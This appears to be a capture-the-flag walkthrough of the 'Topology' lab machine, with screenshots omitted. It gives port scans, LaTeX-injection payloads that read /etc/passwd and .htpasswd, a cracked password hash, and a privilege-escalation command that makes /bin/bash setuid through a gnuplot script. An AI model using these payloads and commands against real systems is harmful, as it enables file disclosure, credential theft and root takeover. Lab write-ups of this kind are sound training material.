Skip to content

Latest commit

 

History

History
69 lines (60 loc) · 2.49 KB

topology.md

File metadata and controls

69 lines (60 loc) · 2.49 KB
Raw
rustscan -a 10.10.11.217 -r 0-65535 --ulimit 5000

image

nmap -Pn -sC -sV -p 22,80 10.10.11.217

image

HTTP image

Latex Equation Generator image image

Subdomain

http://latex.topology.htb/

image

Latex Injection LFI

$\lstinputlisting{/etc/passwd}$

image image

$\lstinputlisting{/var/www/dev/.htaccess}$

image image

$\lstinputlisting{/var/www/dev/.htpasswd}$

image image

Credentials:
vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

Crack Password

john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

image

Cracked Password: calculus20

SSH

ssh vdaisley@10.10.11.217

image

Privilege Escalation

Upload PSPY image image

echo "system 'chmod u+s /bin/bash'" > /opt/gnuplot/payload.plt
/bin/bash -p

image